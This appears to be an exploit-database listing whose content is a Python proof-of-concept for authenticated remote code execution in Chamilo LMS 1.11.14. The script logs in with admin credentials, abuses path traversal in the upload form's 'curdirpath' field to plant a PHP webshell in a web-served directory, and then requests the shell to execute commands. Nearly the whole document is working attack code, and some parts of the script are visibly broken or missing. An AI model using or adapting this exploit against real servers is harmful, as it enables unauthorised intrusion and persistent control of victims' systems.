Exploits / Vulnerability Discovered : 2021-05-14 |
Type : webapps |
Platform : php
This exploit / vulnerability Chamilo lms 1.11.14 remote code execution (authenticated) is for educational purposes only and if it is used you will do on your own risk!
from requests import Session
from random import choice
from string import ascii_lowercase
import requests
# This is all configuration stuff,
url = "" # URL to remote host web root
user_name = "admin" # User must be an administrator
password = "admin"
command = "id;whoami"
# Where you want to upload your webshell. Must be writable by web server user.
# This spot isn't protectec by .htaccess
webshell_path = 'web/'
webshell_name = f"shell-{''.join(choice(ascii_lowercase) for _ in range(6))}.phar" # Just a random name for webshell file
content = f"<?php echo `{command}`; ?>"
def main():
# Run a context manager with a session object to hold login session after login
with Session() as s:
login_url = f"{url}index.php"
login_data = {
"login": user_name,
"password": password
r = s.post(login_url, data=login_data) # login request
# Check to see if login as admin user was successful.
if "admin" not in r.url:
print(f"[-] Login as {user_name} failed. Need to be admin")
print(f"[+] Logged in as {user_name}")
print(f"[+] Cookie: {s.cookies}")
file_upload_url = f"{url}main/upload/upload.php"
# The 'curdirpath' is not santitized, so I traverse to the '/var/www/html/chamilo-lms/web/build' directory. I can upload to /tmp/ as well
php_webshell_file = {
"curdirpath": (None, f"/../../../../../../../../../var/www/html/chamilo-lms/{webshell_path}"),
"user_upload": (webshell_name, content)
## Good command if you want to see what the request looks like without sending
# print(requests.Request('POST', file_upload_url, files=php_webshell_file).prepare().body.decode('ascii'))
# Two requests required to actually upload the file
for i in range(2):
s.post(file_upload_url, files=php_webshell_file)
# This is a GET request to the new webshell to trigger code execution
command_output = s.get(exploit_request_url)
print("[+] Command output:\n")